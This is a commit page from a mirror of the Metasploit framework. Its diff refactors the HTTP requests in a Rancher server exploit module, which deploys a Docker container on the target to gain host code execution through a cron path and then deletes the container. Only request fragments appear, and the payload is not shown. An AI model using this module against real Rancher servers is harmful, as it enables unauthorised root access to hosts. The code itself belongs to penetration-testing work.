infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Use send_request_cgi instead of raw

bug/bundler_fix
Martin Pizala 2017-10-01 02:15:43 +02:00
parent 701d628a1b
commit e3326e1649
No known key found for this signature in database
GPG Key ID: 50F0D0CE74400C95
1 changed files with 13 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

21
modules/exploits/linux/http/rancher_server.rb
View File

@ -59,10 +59,11 @@ class MetasploitModule < Msf::Exploit::Remote
end
def del_container(rancher_container_id, container_id)
res = send_request_raw(
res = send_request_cgi(
'method' => 'DELETE',
'headers' => { 'Accept' => 'application/json' },
'uri' => normalize_uri(target_uri.path, datastore['TARGETENV'], 'containers', rancher_container_id)
'uri' => normalize_uri(target_uri.path, datastore['TARGETENV'], 'containers', rancher_container_id),
'ctype' => 'application/json',
'headers' => { 'Accept' => 'application/json' }
)
return vprint_good('The docker container has been removed.') if res && res.code == 200
@ -105,9 +106,10 @@ class MetasploitModule < Msf::Exploit::Remote
end
def check
res = send_request_raw(
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'ctype' => 'application/json',
'headers' => { 'Accept' => 'application/json' }
)
@ -127,9 +129,10 @@ class MetasploitModule < Msf::Exploit::Remote
environments = JSON.parse(res.body)['data']
environments.each do |e|
res = send_request_raw(
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, e['id'], 'hosts'),
'ctype' => 'application/json',
'headers' => { 'Accept' => 'application/json' }
)
@ -179,10 +182,11 @@ class MetasploitModule < Msf::Exploit::Remote
container_id = make_container_id
# deploy docker container
res = send_request_raw(
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, datastore['TARGETENV'], 'containers'),
'headers' => { 'Accept' => 'application/json', 'Content-Type' => 'application/json' },
'ctype' => 'application/json',
'headers' => { 'Accept' => 'application/json' },
'data' => make_container(mnt_path, cron_path, payload_path, container_id).to_json
)
fail_with(Failure::Unknown, 'Failed to create the docker container') unless res && res.code == 201
@ -203,9 +207,10 @@ class MetasploitModule < Msf::Exploit::Remote
sleep(sleep_time)
wait_time -= sleep_time
res = send_request_raw(
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, datastore['TARGETENV'], 'containers', '?name=' + container_id),
'ctype' => 'application/json',
'headers' => { 'Accept' => 'application/json' }
)
next unless res.code == 200 and res.body.include? 'stopped'